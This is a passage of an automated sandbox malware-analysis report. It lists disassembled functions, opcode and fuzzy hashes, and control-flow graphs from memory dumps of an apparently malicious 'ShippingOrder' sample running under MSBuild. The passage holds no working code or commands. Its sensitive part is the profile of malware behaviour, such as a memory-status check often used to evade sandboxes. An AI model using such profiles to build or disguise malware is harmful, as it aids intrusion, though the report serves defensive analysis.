                                                              • Opcode ID: cdf0ea8e67292e4db9c2661d06463cb2e9bcd706d599a58430d852b1b8a9004c
                                                              • Instruction ID: 145f3a160713f1c6344380c87f3dc5d71c13001bf90d9ce9820201f6e2ca39f0
                                                              • Opcode Fuzzy Hash: cdf0ea8e67292e4db9c2661d06463cb2e9bcd706d599a58430d852b1b8a9004c
                                                              • Instruction Fuzzy Hash: B3117930A09A5D8FDF45EF68C859AE93BF0FF18305F0001A7E419C71A1DA34A544CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A9CC0 Relevance: .1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29fefbb95a92fdcf825005dfd0b2c8c34f5d003efc3666706b21f68a51087f9e
                                                              • Instruction ID: 61ef6e8ad055552d86538acb074220e4a1a01d94d1ff2c050dbdf36fcf9cf205
                                                              • Opcode Fuzzy Hash: 29fefbb95a92fdcf825005dfd0b2c8c34f5d003efc3666706b21f68a51087f9e
                                                              • Instruction Fuzzy Hash: 4F117C3194E78A9FD7539BB488695E47FE0EF06220F1A04FBC449CA0B3EA6C1985C761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A3D39 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9be0e6f0aaf02b9486ed9aa53ea889e8d50bc75ebb3f67337ac5b79957c2e587
                                                              • Instruction ID: e4f38ad3f42dcdf15992991c861adcd6c6a3568c0ac79f520a155b6e8298efe5
                                                              • Opcode Fuzzy Hash: 9be0e6f0aaf02b9486ed9aa53ea889e8d50bc75ebb3f67337ac5b79957c2e587
                                                              • Instruction Fuzzy Hash: 2001A23051DBCC4FC796DB24C4605AABFE1EF89210F4905BFE089C73A2CA25DA04C752
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A04A0 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4237bda1c32c5fa8263474df53e3a9aa5d174c7309e5fac4ed76565d85a0047e
                                                              • Instruction ID: 97c62232bf5ab6aa20db7cfe99adca0f92e3a94144f553a622454f812ec5ac9b
                                                              • Opcode Fuzzy Hash: 4237bda1c32c5fa8263474df53e3a9aa5d174c7309e5fac4ed76565d85a0047e
                                                              • Instruction Fuzzy Hash: B201AD30A2490E5FEB54EF68C815AFEB3B0FF48304F0002B6E41DC21A9DE34A5918641
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A4369 Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d9a0789d20278c37ba01bf727b2ae297d4911fa0d4a3405869fe98ddefc3275e
                                                              • Instruction ID: 4b2df787322886fa91808c6cf89399833abc6efdd18fa0b07dcbdafadef2fcc9
                                                              • Opcode Fuzzy Hash: d9a0789d20278c37ba01bf727b2ae297d4911fa0d4a3405869fe98ddefc3275e
                                                              • Instruction Fuzzy Hash: 13F0F43190A54D8FDF61AF549C516E93BA0FF5A300F050279E81C831E2CA29B665C390
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A57F0 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae83b5326297d32f60fe9bf89724ba1780d2cfe46dcc61ee41c2865029fe00f5
                                                              • Instruction ID: 21657caf012cf86487f90d08d3b454c289e84c4b9e7d0fcfd3002e98afa20335
                                                              • Opcode Fuzzy Hash: ae83b5326297d32f60fe9bf89724ba1780d2cfe46dcc61ee41c2865029fe00f5
                                                              • Instruction Fuzzy Hash: 31F08C62A4F2CA0FE726576858755EA7F60AF06214B0A02F7D0988A0E3D908258AC362
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A57F5 Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c4dc832d2032773706604a29161457fc3e47ab530b99b20ee490f1684e9dcfa
                                                              • Instruction ID: 2b063dadb1e5f5008844941cd6b588ca9d0a8e7fd0891bf6abd3b2f668d006d6
                                                              • Opcode Fuzzy Hash: 7c4dc832d2032773706604a29161457fc3e47ab530b99b20ee490f1684e9dcfa
                                                              • Instruction Fuzzy Hash: EAF04F6154F3CA0FE722576848755EA7F70BF07250B0A01F7D4988A1E3D918159AC362
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8AB8D0 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01ae160f72acbc3052f6fd3da6003957ce8f1572bcea7bfe2e844643fe5f188c
                                                              • Instruction ID: ca54a547e5f7d181a515670e78de01b9a539e0e4d8f8b376bed8f0218d900003
                                                              • Opcode Fuzzy Hash: 01ae160f72acbc3052f6fd3da6003957ce8f1572bcea7bfe2e844643fe5f188c
                                                              • Instruction Fuzzy Hash: A9F0B630A14A0D8FDF84EF68C854ABA77F4FB68304F10056AE41DD32A4DB71AA50CB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A9A01 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1822b2b57faed0f6f7a6de31e62fa71ba3d7e23e9ad5f77c9562a4ac0631213c
                                                              • Instruction ID: 772584b736cc3c3853f93fba159b548c5cf4f061af3f2b3c1aa8de942974c166
                                                              • Opcode Fuzzy Hash: 1822b2b57faed0f6f7a6de31e62fa71ba3d7e23e9ad5f77c9562a4ac0631213c
                                                              • Instruction Fuzzy Hash: D5E0203194F28E4FDB225B5848756D83B60FF45300F4505B7D15C8A0E3EF1CA659C381
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8AB9F5 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54750b4ef2105ee7ffbd32cbfb0f2eeb482d1fe4fedfe9e74305dd2a95de1841
                                                              • Instruction ID: c1130d65b35cc1c293d1ed214661d84ad0c451a9dd1fa6c9e9904470f9c00261
                                                              • Opcode Fuzzy Hash: 54750b4ef2105ee7ffbd32cbfb0f2eeb482d1fe4fedfe9e74305dd2a95de1841
                                                              • Instruction Fuzzy Hash: D1E0922294F28D4BE7325B9488651F87A64FF49200F4A52BAE14C450F3DA1D76448352
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8ABCE9 Relevance: .0, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64ac3a47a0223e59fe7bce8df026c40683be92b56827327b9633e60462cdb29f
                                                              • Instruction ID: b761221382f512c7140f77de0035e7733552d40a69b815a614437479051dc3c6
                                                              • Opcode Fuzzy Hash: 64ac3a47a0223e59fe7bce8df026c40683be92b56827327b9633e60462cdb29f
                                                              • Instruction Fuzzy Hash: 28E06D2284F38D4BE7325BA098711E83F74FF1A200F5611F3D48C860E3DA6D6A59C352
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFD9B8A4FA0 Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2047218298.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b8a0000_ShippingOrder_ GSHS2400052.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2adbf8c39d6cbe4cfc2dcc5836cdcfaa6e40493c63387aad06e9f97dfaf0e55
                                                              • Instruction ID: 376973ca593a903fbfcb110aadf25da6a46f079a24300405455b9a19a9c44e26
                                                              • Opcode Fuzzy Hash: b2adbf8c39d6cbe4cfc2dcc5836cdcfaa6e40493c63387aad06e9f97dfaf0e55
                                                              • Instruction Fuzzy Hash: FAE0ED3092554DABEB51EFA498556EDB7E0FF08304F410476E41CD21A5EA34A294CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:11.5%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                              execution_graph 23603 641ea40 23604 641ea86 GlobalMemoryStatusEx 23603->23604 23605 641eab6 23604->23605

                                                              Executed Functions

                                                              Function 0115ADF0 Relevance: 2.7, Instructions: 2707COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: efcab98e701884edf2b7d94e0d1f296ff33f19e0e804b86fb73c9d2e3ccb8fa8
                                                              • Instruction ID: f886f829a2be1d5eb320677b954f469458c9e510c52273d7f2654de3eeef9ad4
                                                              • Opcode Fuzzy Hash: efcab98e701884edf2b7d94e0d1f296ff33f19e0e804b86fb73c9d2e3ccb8fa8
                                                              • Instruction Fuzzy Hash: 7553E631C10B1ACACB55EF68C890599F7B1FF99300F15D79AE4587B221EB70AAD4CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01153E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vl
                                                              • API String ID: 0-682378881
                                                              • Opcode ID: 97a2041adf35292a429ac86bdf469fb6056b8fa711da8c4882ee14e23d22d06d
                                                              • Instruction ID: 14f483c5b427c0788c65c48d52ad0f6063bc51ed4ccc8e354d8e6de878c7d57d
                                                              • Opcode Fuzzy Hash: 97a2041adf35292a429ac86bdf469fb6056b8fa711da8c4882ee14e23d22d06d
                                                              • Instruction Fuzzy Hash: 6E916270E10209CFDF58CFA9C9957DEBBF2BF48314F148529E825A7254EB749885CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01154A98 Relevance: .3, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9196b616d49f77cfd01150a62f4d6869e0b471c6962daccd759ccf7e32b630f
                                                              • Instruction ID: b79368edc3b7544a2c787670cff1e7cb29fa4d1ac7f28f777f85496a7b62aba6
                                                              • Opcode Fuzzy Hash: a9196b616d49f77cfd01150a62f4d6869e0b471c6962daccd759ccf7e32b630f
                                                              • Instruction Fuzzy Hash: CCB17E70E00209CFDB58CFA9C89179DBBF2AF88314F148529D829E7694FB749885CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01154806 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1609 1154806-115489c 1612 11548e6-11548e8 1609->1612 1613 115489e-11548a9 1609->1613 1614 11548ea-1154902 1612->1614 1613->1612 1615 11548ab-11548b7 1613->1615 1621 1154904-115490f 1614->1621 1622 115494c-115494e 1614->1622 1616 11548b9-11548c3 1615->1616 1617 11548da-11548e4 1615->1617 1619 11548c5 1616->1619 1620 11548c7-11548d6 1616->1620 1617->1614 1619->1620 1620->1620 1623 11548d8 1620->1623 1621->1622 1624 1154911-115491d 1621->1624 1625 1154950-1154962 1622->1625 1623->1617 1626 1154940-115494a 1624->1626 1627 115491f-1154929 1624->1627 1632 1154969-1154995 1625->1632 1626->1625 1628 115492d-115493c 1627->1628 1629 115492b 1627->1629 1628->1628 1631 115493e 1628->1631 1629->1628 1631->1626 1633 115499b-11549a9 1632->1633 1634 11549b2-1154a0f 1633->1634 1635 11549ab-11549b1 1633->1635 1642 1154a11-1154a15 1634->1642 1643 1154a1f-1154a23 1634->1643 1635->1634 1642->1643 1644 1154a17-1154a1a call 1150ab8 1642->1644 1645 1154a25-1154a29 1643->1645 1646 1154a33-1154a37 1643->1646 1644->1643 1645->1646 1648 1154a2b-1154a2e call 1150ab8 1645->1648 1649 1154a47-1154a4b 1646->1649 1650 1154a39-1154a3d 1646->1650 1648->1646 1653 1154a4d-1154a51 1649->1653 1654 1154a5b 1649->1654 1650->1649 1652 1154a3f 1650->1652 1652->1649 1653->1654 1655 1154a53 1653->1655 1656 1154a5c 1654->1656 1655->1654 1656->1656
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vl$\Vl
                                                              • API String ID: 0-415357090
                                                              • Opcode ID: 1d2b2dcf94695908c4cfaea762640ac80babfca181c33d70687929e95addc3c6
                                                              • Instruction ID: 56271cae0744aebfefb6fbbd4dbe765e980c0e44eab673ee4b52f075942e0b30
                                                              • Opcode Fuzzy Hash: 1d2b2dcf94695908c4cfaea762640ac80babfca181c33d70687929e95addc3c6
                                                              • Instruction Fuzzy Hash: 1C718DB0E00249CFDB58CFA9C9857DEBFF1BF48314F148129E825A7654EB349886CB85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01154810 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1657 1154810-115489c 1660 11548e6-11548e8 1657->1660 1661 115489e-11548a9 1657->1661 1662 11548ea-1154902 1660->1662 1661->1660 1663 11548ab-11548b7 1661->1663 1669 1154904-115490f 1662->1669 1670 115494c-115494e 1662->1670 1664 11548b9-11548c3 1663->1664 1665 11548da-11548e4 1663->1665 1667 11548c5 1664->1667 1668 11548c7-11548d6 1664->1668 1665->1662 1667->1668 1668->1668 1671 11548d8 1668->1671 1669->1670 1672 1154911-115491d 1669->1672 1673 1154950-1154995 1670->1673 1671->1665 1674 1154940-115494a 1672->1674 1675 115491f-1154929 1672->1675 1681 115499b-11549a9 1673->1681 1674->1673 1676 115492d-115493c 1675->1676 1677 115492b 1675->1677 1676->1676 1679 115493e 1676->1679 1677->1676 1679->1674 1682 11549b2-1154a0f 1681->1682 1683 11549ab-11549b1 1681->1683 1690 1154a11-1154a15 1682->1690 1691 1154a1f-1154a23 1682->1691 1683->1682 1690->1691 1692 1154a17-1154a1a call 1150ab8 1690->1692 1693 1154a25-1154a29 1691->1693 1694 1154a33-1154a37 1691->1694 1692->1691 1693->1694 1696 1154a2b-1154a2e call 1150ab8 1693->1696 1697 1154a47-1154a4b 1694->1697 1698 1154a39-1154a3d 1694->1698 1696->1694 1701 1154a4d-1154a51 1697->1701 1702 1154a5b 1697->1702 1698->1697 1700 1154a3f 1698->1700 1700->1697 1701->1702 1703 1154a53 1701->1703 1704 1154a5c 1702->1704 1703->1702 1704->1704
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vl$\Vl
                                                              • API String ID: 0-415357090
                                                              • Opcode ID: 26fd8b3006ddbbb2e0d3b5bba1c0732c2b5f003df0870667ecf7b878c057375c
                                                              • Instruction ID: 4ee36b028dbe1a4e2687143a80515b79ee2b6542150c1fe56bb8808d0c49bc34
                                                              • Opcode Fuzzy Hash: 26fd8b3006ddbbb2e0d3b5bba1c0732c2b5f003df0870667ecf7b878c057375c
                                                              • Instruction Fuzzy Hash: D9718070E00249CFDF58CFA9C9857DEBBF2BF88314F148129E825A7654EB749885CB85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0641EA38 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1855 641ea38-641ea7e 1856 641ea86-641eab4 GlobalMemoryStatusEx 1855->1856 1857 641eab6-641eabc 1856->1857 1858 641eabd-641eae5 1856->1858 1857->1858
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 0641EAA7
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4126802505.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6410000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: c19f97a29be080fb7efe80f42e74827a6f3ea7e201a7b184b2e164229c899c16
                                                              • Instruction ID: b3413803fde225c8e388e2e64be5a8e79c5575881cc77e46858580498d81c5f2
                                                              • Opcode Fuzzy Hash: c19f97a29be080fb7efe80f42e74827a6f3ea7e201a7b184b2e164229c899c16
                                                              • Instruction Fuzzy Hash: A51144B5C002599FCB10CF9AC844ADEFBF4FF48314F15826AE818A7240C378AA44CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0641EA40 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 0641EAA7
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4126802505.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6410000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: 79aefcdd2914582993bb5edb89a9266d4303367d5091db91da333f0b1de7b1da
                                                              • Instruction ID: 875ae629636668af5ccfd65faea0af75098743ff551b666ec2868192ed164f3b
                                                              • Opcode Fuzzy Hash: 79aefcdd2914582993bb5edb89a9266d4303367d5091db91da333f0b1de7b1da
                                                              • Instruction Fuzzy Hash: 641120B5C002599BCB10DF9AC945BDEFBF4FF48320F15816AD818A7280D378A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01153E74 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vl
                                                              • API String ID: 0-682378881
                                                              • Opcode ID: 645bbc41b4f5ebfedf1ed38ba190e59e215b30d67cdf90f39ea4ea3704fc0d52
                                                              • Instruction ID: 47f66afefcbd550f69fc4e2ba7ad399d5dc4596842160f8c38c1291e184f5a75
                                                              • Opcode Fuzzy Hash: 645bbc41b4f5ebfedf1ed38ba190e59e215b30d67cdf90f39ea4ea3704fc0d52
                                                              • Instruction Fuzzy Hash: 0DA16F70E10209CFDF58CFA9C9957DDBBF1BF48314F248129E825A7254EB749886CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01156ECF Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR^q
                                                              • API String ID: 0-2625958711
                                                              • Opcode ID: 3609d04d02dc66cc789f54bb69ab15475243c5eb4e3dd74adc4fd3e438cd9f52
                                                              • Instruction ID: f1263313cb3e05a1564b789de9757502a2474a709b8f088e5dd31c0cbe1f80a7
                                                              • Opcode Fuzzy Hash: 3609d04d02dc66cc789f54bb69ab15475243c5eb4e3dd74adc4fd3e438cd9f52
                                                              • Instruction Fuzzy Hash: 6C519C34700214CFDB48DB78C469AAE7BF6EF89304F6044A9E816EB3A1DB759C41CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01157D90 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR^q
                                                              • API String ID: 0-2625958711
                                                              • Opcode ID: ee1ba4f3507a8dcad2d135253c2940f123d75d07d406f2ec80f896984e2edddb
                                                              • Instruction ID: 105ec9b05da55f5db1097811f73e8e9dcfa8d74ae5712e914bbc1fd2782a1016
                                                              • Opcode Fuzzy Hash: ee1ba4f3507a8dcad2d135253c2940f123d75d07d406f2ec80f896984e2edddb
                                                              • Instruction Fuzzy Hash: 2B316F31E10219CFDB5ADFA9C4457AEB7B6FF85300F608526E916EB280DB70A942CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01157D80 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR^q
                                                              • API String ID: 0-2625958711
                                                              • Opcode ID: f2ac2795300e3e6911c30ed67368ef929636df0b49949d0f2308f71486bdb527
                                                              • Instruction ID: 6e6eb545a7162b8aa957f8aec5a0a3f922a742254cee97910077ca70a272c67e
                                                              • Opcode Fuzzy Hash: f2ac2795300e3e6911c30ed67368ef929636df0b49949d0f2308f71486bdb527
                                                              • Instruction Fuzzy Hash: 01316F31E1021ACFDB5ADF79C4457AEB7B2EF85300F658429E816EB281DBB09946CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01156B98 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR^q
                                                              • API String ID: 0-2625958711
                                                              • Opcode ID: d1d293aa6dab54de42f3c9db71fecaa90bc9398ecfcf68e9d130e9a0790f81ac
                                                              • Instruction ID: 45b1bf12cee633cc48c627ab983581d914d4eab9c45c8f5eb1a9993ce36a6e5d
                                                              • Opcode Fuzzy Hash: d1d293aa6dab54de42f3c9db71fecaa90bc9398ecfcf68e9d130e9a0790f81ac
                                                              • Instruction Fuzzy Hash: AB213A303042805FC716A77C94606AE7FF2EF86304B0448EED096CB69ADE354C46C782
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01158720 Relevance: .6, Instructions: 555COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc5c3d6e7242f89a30b41418e045cb6f06e7a7f1e7eb952195be439139fb2537
                                                              • Instruction ID: 80ae6bfb3bbdb7396a9d570775cae266eb85225b3d19e4df7623eee5f0e996c3
                                                              • Opcode Fuzzy Hash: cc5c3d6e7242f89a30b41418e045cb6f06e7a7f1e7eb952195be439139fb2537
                                                              • Instruction Fuzzy Hash: 1E124030B022129FDB59AB3CE45422D33A6EBC5319B508D39E417DB795CF35DD8A8B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0115A1AA Relevance: .4, Instructions: 405COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
